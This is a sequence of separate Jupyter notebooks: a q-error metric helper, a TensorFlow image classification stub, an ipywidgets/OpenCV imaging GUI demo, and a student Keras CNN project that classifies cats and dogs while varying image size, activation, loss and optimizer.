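```python
import numpy as np

def print_qerror(preds, labels):
    # q-error of one estimate: max(pred/true, true/pred); equals 1 for a perfect estimate
    qerror = [max(p / l, l / p) for p, l in zip(np.squeeze(preds), np.squeeze(labels))]
    print("Median: {}".format(np.median(qerror)))
    print("90th percentile: {}".format(np.percentile(qerror, 90)))
    print("95th percentile: {}".format(np.percentile(qerror, 95)))
    print("99th percentile: {}".format(np.percentile(qerror, 99)))
    print("Max: {}".format(np.max(qerror)))
    print("Mean: {}".format(np.mean(qerror)))
```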
tfsimple.ipynb
###Markdown Simple Tensorflow image classification ###Code from __future__ import absolute_import from __future__ import division from __future__ import print_function import numpy as np import tensorflow as tf import time import data_helpers beginTime = time.time() # Parameter definitions batch_size = 100 learning_rate = 0.005 max_steps = 1000 # Uncommenting this line removes randomness # You'll get exactly the same result on each run # np.random.seed(1) # Prepare data data_sets = data_helpers.load_data() ###Output _____no_output_____
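The cell above stops after loading the data; in this style of tutorial the classifier itself is typically a single softmax layer trained with plain gradient descent. A hedged sketch of how the remaining cells might look is below — it assumes `data_helpers.load_data()` returns a dict with `images_train`, `labels_train`, `images_test`, `labels_test` holding flattened 3072-dimensional CIFAR-10-style images, which is our assumption and not confirmed by the notebook.

```python
# Placeholders for image vectors and integer class labels (assumed: 3072 features, 10 classes)
images_placeholder = tf.placeholder(tf.float32, shape=[None, 3072])
labels_placeholder = tf.placeholder(tf.int64, shape=[None])

# Single linear layer followed by softmax cross-entropy
weights = tf.Variable(tf.zeros([3072, 10]))
biases = tf.Variable(tf.zeros([10]))
logits = tf.matmul(images_placeholder, weights) + biases
loss = tf.reduce_mean(tf.nn.sparse_softmax_cross_entropy_with_logits(
    logits=logits, labels=labels_placeholder))
train_step = tf.train.GradientDescentOptimizer(learning_rate).minimize(loss)

correct = tf.equal(tf.argmax(logits, 1), labels_placeholder)
accuracy = tf.reduce_mean(tf.cast(correct, tf.float32))

with tf.Session() as sess:
    sess.run(tf.global_variables_initializer())
    for i in range(max_steps):
        # sample a random mini-batch of the assumed training arrays
        indices = np.random.choice(data_sets['images_train'].shape[0], batch_size)
        sess.run(train_step, feed_dict={
            images_placeholder: data_sets['images_train'][indices],
            labels_placeholder: data_sets['labels_train'][indices]})
    test_accuracy = sess.run(accuracy, feed_dict={
        images_placeholder: data_sets['images_test'],
        labels_placeholder: data_sets['labels_test']})
    print('Test accuracy: {:.3f}'.format(test_accuracy))
print('Total time: {:.2f}s'.format(time.time() - beginTime))
```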
examples/.ipynb_checkpoints/imaging_and_gui-checkpoint.ipynb
###Markdown Snap ###Code # test image stack arr = [] for i in range(50): b = np.random.rand(500,500) b= (b*(2**16-1)).astype('uint16') arr.append(b) # snap (MPL) button = widgets.Button(description='Snap') display.display(button) def on_button_clicked(b): img=arr.pop() plt.imshow(img, cmap='gray') display.clear_output(wait=True) display.display(plt.gcf()) button.on_click(on_button_clicked) # snap (CV2) button = widgets.Button(description='Snap') display.display(button) def on_button_clicked(b): img=arr.pop() cv2.imshow('Video',img) cv2.waitKey(30) button.on_click(on_button_clicked) ###Output _____no_output_____ ###Markdown Video http://opencv-python-tutroals.readthedocs.io/en/latest/py_tutorials/py_gui/py_video_display/py_video_display.html ###Code # test image stack a = [] for i in range(50): b = np.zeros((500,500)) b[i:i+100, i:i+100]=1.0 b=b*255 b=b.astype('uint8') a.append(b) # video (MPL) (slow, doesn't work well) # for img in a: # plt.imshow(img, cmap='gray') # display.clear_output(wait=True) # display.display(plt.gcf()) # video (CV2) cv2.namedWindow('Video',cv2.WINDOW_NORMAL) for img in a: b = cv2.imshow('Video',img) cv2.resizeWindow('Video', 500,500) cv2.moveWindow('Video',0,0) display.clear_output(wait=True) print np.random.randn(1) if cv2.waitKey(30) >= 0: break cv2.destroyAllWindows() # video with button (CV2) button = widgets.Button(description='Live') display.display(button) def on_button_clicked(b): for img in a: cv2.imshow('Video',img) cv2.waitKey(30) display.clear_output(wait=True) print np.random.randn(1) button.on_click(on_button_clicked) ###Output _____no_output_____ ###Markdown GUI and BUTTONS http://docs.opencv.org/2.4/modules/highgui/doc/user_interface.html ###Code button = widgets.ToggleButton(description='Live', value=False) def on_click(change): display.clear_output(wait=True) print change['new'] button.observe(on_click, names='value') display.display(button) import time b1 = widgets.Button(description='b1') b2 = widgets.Button(description='b2') def ctrlloop(): def b1_click(b): for i in range(10): print 'b1', i time.sleep(0.5) def b2_click(b): for i in range(10): print 'b2', i # dl = widgets.jsdlink((button, 'value'), (vid, 'value')) b1.on_click(b1_click) b2.on_click(b2_click) widgets.HBox([b1,b2]) play = widgets.Play( interval=160, value=50, min=0, max=100, step=1, description="Press play", disabled=False ) slider = widgets.IntSlider() widgets.jslink((play, 'value'), (slider, 'value')) widgets.HBox([play, slider]) f = open('temp.msg','wb') f.write(str(1)) f.close() ###Output _____no_output_____ ###Markdown Arrows ###Code # icons are from "font-awesome" x_minus = widgets.Button( description='', disabled=False, button_style='', icon = 'arrow-left') x_plus = widgets.Button( description='', disabled=False, button_style='', icon = 'arrow-right') y_minus = widgets.Button( description='', disabled=False, button_style='', icon='arrow-up') y_plus = widgets.Button( description='', disabled=False, button_style='', icon = 'arrow-down') xy_slider = widgets.VBox([widgets.FloatText(description='speed', width='30%',value=50),widgets.IntSlider(width=100, step=10)]) xy_cluster = widgets.VBox([ widgets.HBox([x_minus,x_plus]), widgets.HBox([y_minus, y_plus]) ]) z_minus = widgets.Button( description='', disabled=False, button_style='', icon = 'arrow-up') z_plus = widgets.Button( description='', disabled=False, button_style='', icon = 'arrow-down') z_slider = widgets.VBox([widgets.FloatText(description='speed', width='30%',value=50),widgets.IntSlider(width=100, step=10)]) z_cluster = 
widgets.VBox([ z_minus, z_plus]) widgets.HBox([xy_cluster, xy_slider, z_cluster, z_slider]) ###Output Widget Javascript not detected. It may not be installed properly. Did you enable the widgetsnbextension? If not, then run "jupyter nbextension enable --py --sys-prefix widgetsnbextension"
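The arrow buttons above are only laid out, not yet connected to anything. A hedged sketch of how they might be wired to a stage controller is below; `move_stage(axis, delta)` is a hypothetical placeholder for the real hardware call (not part of this notebook), and it assumes the `FloatText` speed box is the first child of each slider `VBox`.

```python
def move_stage(axis, delta):
    # hypothetical placeholder for the real hardware call
    print('move %s by %+.1f' % (axis, delta))

def make_handler(axis, sign, speed_box):
    # build a click handler that reads the current speed from the FloatText widget
    def handler(b):
        speed = speed_box.children[0].value  # assumes FloatText is the first child
        move_stage(axis, sign * speed)
    return handler

x_minus.on_click(make_handler('x', -1, xy_slider))
x_plus.on_click(make_handler('x', +1, xy_slider))
y_minus.on_click(make_handler('y', -1, xy_slider))
y_plus.on_click(make_handler('y', +1, xy_slider))
z_minus.on_click(make_handler('z', -1, z_slider))
z_plus.on_click(make_handler('z', +1, z_slider))
```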
ProjectCatDog(2).ipynb
###Markdown We use keras to build our model; first, let us import the packages ###Code import os, cv2, random import numpy as np import pandas as pd import matplotlib.pyplot as plt from matplotlib import ticker import seaborn as sns %matplotlib inline from keras.models import Sequential from keras.layers import Input, Dropout, Flatten, Convolution2D, MaxPooling2D, Dense, Activation from keras.optimizers import RMSprop from keras.callbacks import ModelCheckpoint, Callback, EarlyStopping from keras.utils import np_utils ###Output C:\Users\HH\Anaconda3\lib\site-packages\h5py\__init__.py:36: FutureWarning: Conversion of the second argument of issubdtype from `float` to `np.floating` is deprecated. In future, it will be treated as `np.float64 == np.dtype(float).type`. from ._conv import register_converters as _register_converters Using TensorFlow backend. ###Markdown Preparing the Data This function resizes the images to 64x64. We use the 25000 labelled images as the training sample and the 250 images in the test directory as the test sample. I also separated cats and dogs for exploratory analysis. ###Code TRAIN_DIR = './train/train/' TEST_DIR = './test/test/' ROWS = 64 COLS = 64 CHANNELS = 3 train_images = [TRAIN_DIR+i for i in os.listdir(TRAIN_DIR)] # use this for full dataset train_dogs = [TRAIN_DIR+i for i in os.listdir(TRAIN_DIR) if 'dog' in i] train_cats = [TRAIN_DIR+i for i in os.listdir(TRAIN_DIR) if 'cat' in i] test_images = [TEST_DIR+i for i in os.listdir(TEST_DIR)] def read_image(file_path): img = cv2.imread(file_path, cv2.IMREAD_COLOR) #cv2.IMREAD_GRAYSCALE return cv2.resize(img, (ROWS, COLS), interpolation=cv2.INTER_CUBIC) def prep_data(images): count = len(images) data = np.ndarray((count, CHANNELS, ROWS, COLS), dtype=np.uint8) for i, image_file in enumerate(images): image = read_image(image_file) data[i] = image.T if i%2500 == 0: print('Processed {} of {}'.format(i, count)) return data train = prep_data(train_images) test = prep_data(test_images) print("Train shape: {}".format(train.shape)) print("Test shape: {}".format(test.shape)) ###Output Processed 0 of 25000 Processed 2500 of 25000 Processed 5000 of 25000 Processed 7500 of 25000 Processed 10000 of 25000 Processed 12500 of 25000 Processed 15000 of 25000 Processed 17500 of 25000 Processed 20000 of 25000 Processed 22500 of 25000 Processed 0 of 250 Train shape: (25000, 3, 64, 64) Test shape: (250, 3, 64, 64) ###Markdown Generating the Labels We're dealing with a binary classification problem here - (1) dog (0) cat. The labels can be created by looping over the file names in the train directory. It's nice to see the training data is perfectly balanced. ###Code labels = [] for i in train_images: if 'dog' in i: labels.append(1) else: labels.append(0) train = train.reshape(-1,3,64,64) test = test.reshape(-1,3,64,64) X_train = train.astype('float64') X_test = test.astype('float64') X_train /= 255 X_test /= 255 Y_train = labels X_valid = X_train[:5000, :, :, :] Y_valid = Y_train[:5000] X_train = X_train[5001:25000, :, :, :] # note: starting at index 5001 skips one image, hence the 19999 training samples below Y_train = Y_train[5001:25000] print("Training matrix shape", X_train.shape) print("Testing matrix shape", X_test.shape) sns.countplot(labels) plt.title('Cats and Dogs') ###Output Training matrix shape (19999, 3, 64, 64) Testing matrix shape (250, 3, 64, 64) ###Markdown Checking out Cats and Dogs A quick side-by-side comparison of the animals. 
###Code def show_cats_and_dogs(idx): cat = read_image(train_cats[idx]) dog = read_image(train_dogs[idx]) pair = np.concatenate((cat, dog), axis=1) plt.figure(figsize=(10,5)) plt.imshow(pair) plt.show() for idx in range(0,5): show_cats_and_dogs(idx) ###Output _____no_output_____ ###Markdown Build the model A scaled down version of the VGG-16, with a few notable changes. Number of convolution filters cut in half, fully connected (dense) layers scaled down. Set RMSprop as the optimizer. Set binary_crossentropy as the loss function. Set sigmoid as the activation function. ###Code optimizer = RMSprop(lr=1e-4) objective = 'binary_crossentropy' def catdog(): model = Sequential() model.add(Convolution2D(32, 3, 3, border_mode='same', input_shape=(3, ROWS, COLS), activation='relu')) model.add(Convolution2D(32, 3, 3, border_mode='same', activation='relu')) model.add(MaxPooling2D(pool_size=(1, 2))) model.add(Convolution2D(64, 3, 3, border_mode='same', activation='relu')) model.add(Convolution2D(64, 3, 3, border_mode='same', activation='relu')) model.add(MaxPooling2D(pool_size=(1, 2))) model.add(Convolution2D(128, 3, 3, border_mode='same', activation='relu')) model.add(Convolution2D(128, 3, 3, border_mode='same', activation='relu')) model.add(MaxPooling2D(pool_size=(1, 2))) model.add(Convolution2D(256, 3, 3, border_mode='same', activation='relu')) model.add(Convolution2D(256, 3, 3, border_mode='same', activation='relu')) model.add(MaxPooling2D(pool_size=(1, 2))) model.add(Flatten()) model.add(Dense(256, activation='relu')) model.add(Dropout(0.5)) model.add(Dense(256, activation='relu')) model.add(Dropout(0.5)) model.add(Dense(1)) model.add(Activation('sigmoid')) model.compile(loss=objective, optimizer=optimizer, metrics=['accuracy']) return model model = catdog() model.summary() ###Output C:\Users\HH\Anaconda3\lib\site-packages\ipykernel_launcher.py:9: UserWarning: Update your `Conv2D` call to the Keras 2 API: `Conv2D(32, (3, 3), input_shape=(3, 64, 64..., activation="relu", padding="same")` if __name__ == '__main__': C:\Users\HH\Anaconda3\lib\site-packages\ipykernel_launcher.py:10: UserWarning: Update your `Conv2D` call to the Keras 2 API: `Conv2D(32, (3, 3), activation="relu", padding="same")` # Remove the CWD from sys.path while we load stuff. 
C:\Users\HH\Anaconda3\lib\site-packages\ipykernel_launcher.py:13: UserWarning: Update your `Conv2D` call to the Keras 2 API: `Conv2D(64, (3, 3), activation="relu", padding="same")` del sys.path[0] C:\Users\HH\Anaconda3\lib\site-packages\ipykernel_launcher.py:14: UserWarning: Update your `Conv2D` call to the Keras 2 API: `Conv2D(64, (3, 3), activation="relu", padding="same")` C:\Users\HH\Anaconda3\lib\site-packages\ipykernel_launcher.py:17: UserWarning: Update your `Conv2D` call to the Keras 2 API: `Conv2D(128, (3, 3), activation="relu", padding="same")` C:\Users\HH\Anaconda3\lib\site-packages\ipykernel_launcher.py:18: UserWarning: Update your `Conv2D` call to the Keras 2 API: `Conv2D(128, (3, 3), activation="relu", padding="same")` C:\Users\HH\Anaconda3\lib\site-packages\ipykernel_launcher.py:21: UserWarning: Update your `Conv2D` call to the Keras 2 API: `Conv2D(256, (3, 3), activation="relu", padding="same")` C:\Users\HH\Anaconda3\lib\site-packages\ipykernel_launcher.py:22: UserWarning: Update your `Conv2D` call to the Keras 2 API: `Conv2D(256, (3, 3), activation="relu", padding="same")` ###Markdown Train Set the number of epochs to 4 and the batch size to 128 ###Code model.fit( X_train, Y_train, batch_size = 128, nb_epoch = 4, verbose = 1, validation_data = (X_valid, Y_valid) ) ###Output C:\Users\HH\Anaconda3\lib\site-packages\keras\models.py:942: UserWarning: The `nb_epoch` argument in `fit` has been renamed `epochs`. warnings.warn('The `nb_epoch` argument in `fit` ' ###Markdown The final accuracy is 0.87. This result is not very good, so we try changing some parameters to see the difference. Change the image resolution Resize the images to 32x32 and change the number of channels to 1 ###Code TRAIN_DIR = './train/train/' TEST_DIR = './test/test/' ROWS = 32 COLS = 32 CHANNELS = 1 train_images = [TRAIN_DIR+i for i in os.listdir(TRAIN_DIR)] # use this for full dataset train_dogs = [TRAIN_DIR+i for i in os.listdir(TRAIN_DIR) if 'dog' in i] train_cats = [TRAIN_DIR+i for i in os.listdir(TRAIN_DIR) if 'cat' in i] test_images = [TEST_DIR+i for i in os.listdir(TEST_DIR)] def read_image(file_path): img = cv2.imread(file_path, cv2.IMREAD_GRAYSCALE) #cv2.IMREAD_GRAYSCALE return cv2.resize(img, (ROWS, COLS), interpolation=cv2.INTER_CUBIC) def prep_data(images): count = len(images) data = np.ndarray((count, CHANNELS, ROWS, COLS), dtype=np.uint8) for i, image_file in enumerate(images): image = read_image(image_file) data[i] = image.T if i%2500 == 0: print('Processed {} of {}'.format(i, count)) return data train = prep_data(train_images) test = prep_data(test_images) print("Train shape: {}".format(train.shape)) print("Test shape: {}".format(test.shape)) labels = [] for i in train_images: if 'dog' in i: labels.append(1) else: labels.append(0) train = train.reshape(-1, 32,32,1) test = test.reshape(-1, 32,32,1) X_train = train.astype('float32') X_test = test.astype('float32') X_train /= 255 X_test /= 255 Y_train=labels X_valid = X_train[:5000,:,:,:] Y_valid = Y_train[:5000] X_train = X_train[5001:25000,:,:,:] Y_train = Y_train[5001:25000] print("Training matrix shape", X_train.shape) print("Testing matrix shape", X_test.shape) optimizer = RMSprop(lr=1e-4) objective = 'binary_crossentropy' def catdog(): model = Sequential() model.add(Convolution2D(16, 3, 3, border_mode='same', input_shape=(ROWS, COLS, CHANNELS), activation='relu')) model.add(Convolution2D(16, 3, 3, border_mode='same', activation='relu')) model.add(MaxPooling2D(pool_size=(2, 2))) model.add(Convolution2D(32, 3, 3, border_mode='same', activation='relu')) 
model.add(Convolution2D(32, 3, 3, border_mode='same', activation='relu')) model.add(MaxPooling2D(pool_size=(2, 2))) model.add(Convolution2D(64, 3, 3, border_mode='same', activation='relu')) model.add(Convolution2D(64, 3, 3, border_mode='same', activation='relu')) model.add(MaxPooling2D(pool_size=(1, 1))) model.add(Convolution2D(128, 3, 3, border_mode='same', activation='relu')) model.add(Convolution2D(128, 3, 3, border_mode='same', activation='relu')) model.add(MaxPooling2D(pool_size=(1, 1))) model.add(Flatten()) model.add(Dense(128, activation='relu')) model.add(Dropout(0.5)) model.add(Dense(128, activation='relu')) model.add(Dropout(0.5)) model.add(Dense(1)) model.add(Activation('sigmoid')) model.compile(loss=objective, optimizer=optimizer, metrics=['accuracy']) return model model = catdog() model.fit( X_train, Y_train, batch_size = 128, nb_epoch = 4, verbose = 1, validation_data = (X_valid, Y_valid) ) ###Output C:\Users\HH\Anaconda3\lib\site-packages\keras\models.py:942: UserWarning: The `nb_epoch` argument in `fit` has been renamed `epochs`. warnings.warn('The `nb_epoch` argument in `fit` ' ###Markdown The train accuracy and the test accuracy are both lower. Resize the images to 256x256 and change the number of channels to 3 (note that the training tensors below are still built at 64x64 via ROWS2/COLS2; only test2 uses the full 256x256 resolution). ###Code import os, cv2, random import numpy as np import pandas as pd import matplotlib.pyplot as plt from matplotlib import ticker import seaborn as sns %matplotlib inline from keras import backend as K from keras.models import Sequential from keras.layers import Input, Dropout, Flatten, Conv2D, MaxPooling2D, Dense, Activation from keras.optimizers import RMSprop from keras.callbacks import ModelCheckpoint, Callback, EarlyStopping from keras.utils import np_utils import os, cv2, random import numpy as np import pandas as pd TRAIN_DIR = './train/train/' TEST_DIR = './test/test/' ROWS = 256 COLS = 256 ROWS2 = 64 COLS2 = 64 CHANNELS = 3 train_images = [TRAIN_DIR+i for i in os.listdir(TRAIN_DIR)] # use this for full dataset train_dogs = [TRAIN_DIR+i for i in os.listdir(TRAIN_DIR) if 'dog' in i] train_cats = [TRAIN_DIR+i for i in os.listdir(TRAIN_DIR) if 'cat' in i] test_images = [TEST_DIR+i for i in os.listdir(TEST_DIR)] # slice datasets for memory efficiency on Kaggle Kernels, delete if using full dataset train_images = train_dogs[:10000] + train_cats[:10000] random.shuffle(train_images) test_images = test_images[:250] def read_image(file_path): img = cv2.imread(file_path, cv2.IMREAD_COLOR) #cv2.IMREAD_GRAYSCALE b,g,r = cv2.split(img) img2 = cv2.merge([r,g,b]) return cv2.resize(img2, (ROWS2, COLS2), interpolation=cv2.INTER_CUBIC) def read_image2(file_path): img = cv2.imread(file_path, cv2.IMREAD_COLOR) #cv2.IMREAD_GRAYSCALE b,g,r = cv2.split(img) img2 = cv2.merge([r,g,b]) return cv2.resize(img2, (ROWS, COLS), interpolation=cv2.INTER_CUBIC) def prep_data(images): count = len(images) data = np.ndarray((count, CHANNELS, ROWS2, COLS2), dtype=np.uint8) for i, image_file in enumerate(images): image = read_image(image_file) data[i] = image.T if i%2500 == 0: print('Processed {} of {}'.format(i, count)) return data def prep_data2(images): count = len(images) data = np.ndarray((count, CHANNELS, ROWS, COLS), dtype=np.uint8) for i, image_file in enumerate(images): image = read_image2(image_file) data[i] = image.T if i%100 == 0: print('Processed {} of {}'.format(i, count)) return data train = prep_data(train_images) test = prep_data(test_images) test2 = prep_data2(test_images) print("Train shape: {}".format(train.shape)) print("Test shape: {}".format(test.shape)) labels = [] for i in 
train_images: if 'dog' in i: labels.append(1) else: labels.append(0) sns.countplot(labels) from keras.models import Sequential from keras.layers import Input, Dropout, Flatten, Conv2D, MaxPooling2D, Dense, Activation from keras.optimizers import RMSprop from keras.callbacks import ModelCheckpoint, Callback, EarlyStopping from keras.utils import np_utils optimizer = RMSprop(lr=1e-4) objective = 'binary_crossentropy' def catdog(): model = Sequential() model.add(Conv2D(32, 3, padding='same', input_shape=train.shape[1:], activation='relu')) model.add(Conv2D(32, 3, padding='same', activation='relu')) model.add(MaxPooling2D(pool_size=(2, 2), data_format="channels_first")) #print("First layer...") model.add(Conv2D(64, 3, padding='same', activation='relu')) model.add(Conv2D(64, 3, padding='same', activation='relu')) model.add(MaxPooling2D(pool_size=(2, 2), data_format="channels_first")) #print("Second layer...") model.add(Conv2D(128, 3, padding='same', activation='relu')) model.add(Conv2D(128, 3, padding='same', activation='relu')) model.add(MaxPooling2D(pool_size=(2, 2), data_format="channels_first")) #print("Third layer...") model.add(Conv2D(256, (3, 3), padding='same', activation='relu')) model.add(Conv2D(256, (3, 3), padding='same', activation='relu')) model.add(Conv2D(256, (3, 3), padding='same', activation='relu')) model.add(MaxPooling2D(pool_size=(2, 2), data_format="channels_first")) #model.add(Conv2D(256, (3, 3), padding='same', activation='relu')) #model.add(Conv2D(256, (3, 3), padding='same', activation='relu')) #model.add(Conv2D(256, (3, 3), padding='same', activation='relu')) #model.add(MaxPooling2D(pool_size=(2, 2))) #print("Flattening, etc...") model.add(Flatten()) model.add(Dense(256, activation='relu')) model.add(Dropout(0.5)) model.add(Dense(256, activation='relu')) model.add(Dropout(0.5)) model.add(Dense(1)) model.add(Activation('sigmoid')) print("Compiling model...") model.compile(loss=objective, optimizer=optimizer, metrics=['accuracy']) return model print("Creating model:") model = catdog() from keras.models import Sequential from keras.layers import Input, Dropout, Flatten, Conv2D, MaxPooling2D, Dense, Activation from keras.optimizers import RMSprop from keras.callbacks import ModelCheckpoint, Callback, EarlyStopping from keras.utils import np_utils epochs =4 batch_size = 128 ## Callback for loss logging per epoch class LossHistory(Callback): def on_train_begin(self, logs={}): self.losses = [] self.val_losses = [] def on_epoch_end(self, batch, logs={}): self.losses.append(logs.get('loss')) self.val_losses.append(logs.get('val_loss')) early_stopping = EarlyStopping(monitor='val_loss', patience=3, verbose=1, mode='auto') def run_catdog(): history = LossHistory() print("running model...") model.fit(train, labels, batch_size=batch_size, epochs=epochs, validation_split=0.25, verbose=2, shuffle=True, callbacks=[history, early_stopping]) print("making predictions on test set...") predictions = model.predict(test, verbose=0) return predictions, history predictions, history = run_catdog() loss = history.losses val_loss = history.val_losses plt.xlabel('Epochs') plt.ylabel('Loss') plt.title('VGG-16 Loss Trend') plt.plot(loss, 'blue', label='Training Loss') plt.plot(val_loss, 'green', label='Validation Loss') plt.xticks(range(0,epochs)[0::2]) plt.legend() plt.show() ###Output running model... 
Train on 15000 samples, validate on 5000 samples Epoch 1/4 - 155s - loss: 2.2850 - acc: 0.5029 - val_loss: 7.9552 - val_acc: 0.4658 Epoch 2/4 - 159s - loss: 7.8637 - acc: 0.5083 - val_loss: 7.9785 - val_acc: 0.5050 Epoch 3/4 - 162s - loss: 8.1218 - acc: 0.4949 - val_loss: 7.9785 - val_acc: 0.5050 Epoch 4/4 - 160s - loss: 8.0103 - acc: 0.5021 - val_loss: 7.9785 - val_acc: 0.5050 Epoch 00004: early stopping making predictions on test set... ###Markdown The train accuracy and test accuracy both become much lower. So the best size should be 64x64. Change Activation Function Change the activation function from 'relu' to 'sigmoid'. A wide variety of sigmoid functions have been used as the activation function of artificial neurons, including the logistic and hyperbolic tangent functions. Sigmoid curves are also common in statistics as cumulative distribution functions (which go from 0 to 1), such as the integrals of the logistic distribution, the normal distribution, and Student's t probability density functions. So we want to try the sigmoid function to increase the accuracy. ###Code optimizer = RMSprop(lr=1e-4) objective = 'binary_crossentropy' def catdog(): model = Sequential() model.add(Convolution2D(32, 3, 3, border_mode='same', input_shape=(3, ROWS, COLS), activation='relu')) model.add(Convolution2D(32, 3, 3, border_mode='same', activation='relu')) model.add(MaxPooling2D(pool_size=(1, 2))) model.add(Convolution2D(64, 3, 3, border_mode='same', activation='relu')) model.add(Convolution2D(64, 3, 3, border_mode='same', activation='relu')) model.add(MaxPooling2D(pool_size=(1, 2))) model.add(Convolution2D(128, 3, 3, border_mode='same', activation='relu')) model.add(Convolution2D(128, 3, 3, border_mode='same', activation='relu')) model.add(MaxPooling2D(pool_size=(1, 2))) model.add(Convolution2D(256, 3, 3, border_mode='same', activation='relu')) model.add(Convolution2D(256, 3, 3, border_mode='same', activation='relu')) # model.add(Convolution2D(256, 3, 3, border_mode='same', activation='relu')) model.add(MaxPooling2D(pool_size=(1, 2))) # model.add(Convolution2D(256, 3, 3, border_mode='same', activation='relu')) # model.add(Convolution2D(256, 3, 3, border_mode='same', activation='relu')) # model.add(Convolution2D(256, 3, 3, border_mode='same', activation='relu')) # model.add(MaxPooling2D(pool_size=(1, 2))) model.add(Flatten()) model.add(Dense(256, activation='sigmoid')) model.add(Dropout(0.5)) model.add(Dense(256, activation='sigmoid')) model.add(Dropout(0.5)) model.add(Dense(1)) model.add(Activation('sigmoid')) model.compile(loss=objective, optimizer=optimizer, metrics=['accuracy']) return model model = catdog() model.fit( X_train, Y_train, batch_size = 128, nb_epoch = 4, verbose = 1, validation_data = (X_valid, Y_valid) ) ###Output C:\Users\HH\Anaconda3\lib\site-packages\keras\models.py:942: UserWarning: The `nb_epoch` argument in `fit` has been renamed `epochs`. warnings.warn('The `nb_epoch` argument in `fit` ' ###Markdown The accuracy is very low, so we keep relu as the activation function. Change the loss function Change the loss function from 'binary_crossentropy' to 'mean_squared_error'. Mean squared error measures the average of the squares of the errors or deviations—that is, the difference between the estimator and what is estimated. MSE is a risk function, corresponding to the expected value of the squared error loss or quadratic loss. The difference occurs because of randomness or because the estimator doesn't account for information that could produce a more accurate estimate. 
###Code optimizer = RMSprop(lr=1e-4) def catdog(): model = Sequential() model.add(Convolution2D(32, 3, 3, border_mode='same', input_shape=(3, ROWS, COLS), activation='relu')) model.add(Convolution2D(32, 3, 3, border_mode='same', activation='relu')) model.add(MaxPooling2D(pool_size=(1, 2))) model.add(Convolution2D(64, 3, 3, border_mode='same', activation='relu')) model.add(Convolution2D(64, 3, 3, border_mode='same', activation='relu')) model.add(MaxPooling2D(pool_size=(1, 2))) model.add(Convolution2D(128, 3, 3, border_mode='same', activation='relu')) model.add(Convolution2D(128, 3, 3, border_mode='same', activation='relu')) model.add(MaxPooling2D(pool_size=(1, 2))) model.add(Convolution2D(256, 3, 3, border_mode='same', activation='relu')) model.add(Convolution2D(256, 3, 3, border_mode='same', activation='relu')) # model.add(Convolution2D(256, 3, 3, border_mode='same', activation='relu')) model.add(MaxPooling2D(pool_size=(1, 2))) # model.add(Convolution2D(256, 3, 3, border_mode='same', activation='relu')) # model.add(Convolution2D(256, 3, 3, border_mode='same', activation='relu')) # model.add(Convolution2D(256, 3, 3, border_mode='same', activation='relu')) # model.add(MaxPooling2D(pool_size=(1, 2))) model.add(Flatten()) model.add(Dense(256, activation='relu')) model.add(Dropout(0.5)) model.add(Dense(256, activation='relu')) model.add(Dropout(0.5)) model.add(Dense(1)) model.add(Activation('sigmoid')) model.compile(loss='mean_squared_error', optimizer=optimizer) return model model = catdog() model.fit( X_train, Y_train, batch_size = 128, nb_epoch = 4, verbose = 1, validation_data = (X_valid, Y_valid) ) ###Output C:\Users\HH\Anaconda3\lib\site-packages\keras\models.py:942: UserWarning: The `nb_epoch` argument in `fit` has been renamed `epochs`. warnings.warn('The `nb_epoch` argument in `fit` ' ###Markdown mean_squared_error is also not suitable. binary_crossentropy corresponds to Logarithmic Loss, or simply Log Loss, a classification loss function often used as an evaluation metric in Kaggle competitions. Since success in these competitions hinges on effectively minimising the Log Loss, it makes sense to have some understanding of how this metric is calculated and how it should be interpreted. Our project is a classification task, so binary_crossentropy should be the best choice. Change the optimizer Change the optimizer from 'RMSprop' to 'adam'. RMSprop is an unpublished, adaptive learning rate method proposed by Geoff Hinton in Lecture 6e of his Coursera class. RMSprop and Adadelta were both developed independently around the same time, stemming from the need to resolve Adagrad's radically diminishing learning rates. Adaptive Moment Estimation (Adam) is another method that computes adaptive learning rates for each parameter. In addition to storing an exponentially decaying average of past squared gradients v_t like Adadelta and RMSprop, Adam also keeps an exponentially decaying average of past gradients m_t, similar to momentum. Whereas momentum can be seen as a ball running down a slope, Adam behaves like a heavy ball with friction, and thus prefers flat minima in the error surface. 
###Code optimizer = 'adam' objective = 'binary_crossentropy' def catdog(): model = Sequential() model.add(Convolution2D(32, 3, 3, border_mode='same', input_shape=(3, ROWS, COLS), activation='relu')) model.add(Convolution2D(32, 3, 3, border_mode='same', activation='relu')) model.add(MaxPooling2D(pool_size=(1, 2))) model.add(Convolution2D(64, 3, 3, border_mode='same', activation='relu')) model.add(Convolution2D(64, 3, 3, border_mode='same', activation='relu')) model.add(MaxPooling2D(pool_size=(1, 2))) model.add(Convolution2D(128, 3, 3, border_mode='same', activation='relu')) model.add(Convolution2D(128, 3, 3, border_mode='same', activation='relu')) model.add(MaxPooling2D(pool_size=(1, 2))) model.add(Convolution2D(256, 3, 3, border_mode='same', activation='relu')) model.add(Convolution2D(256, 3, 3, border_mode='same', activation='relu')) # model.add(Convolution2D(256, 3, 3, border_mode='same', activation='relu')) model.add(MaxPooling2D(pool_size=(1, 2))) # model.add(Convolution2D(256, 3, 3, border_mode='same', activation='relu')) # model.add(Convolution2D(256, 3, 3, border_mode='same', activation='relu')) # model.add(Convolution2D(256, 3, 3, border_mode='same', activation='relu')) # model.add(MaxPooling2D(pool_size=(1, 2))) model.add(Flatten()) model.add(Dense(256, activation='relu')) model.add(Dropout(0.5)) model.add(Dense(256, activation='relu')) model.add(Dropout(0.5)) model.add(Dense(1)) model.add(Activation('sigmoid')) model.compile(loss=objective, optimizer='adam', metrics=['accuracy']) return model model = catdog() model.fit( X_train, Y_train, batch_size = 128, nb_epoch = 4, verbose = 1, validation_data = (X_valid, Y_valid) ) ###Output C:\Users\HH\Anaconda3\lib\site-packages\keras\models.py:942: UserWarning: The `nb_epoch` argument in `fit` has been renamed `epochs`. 
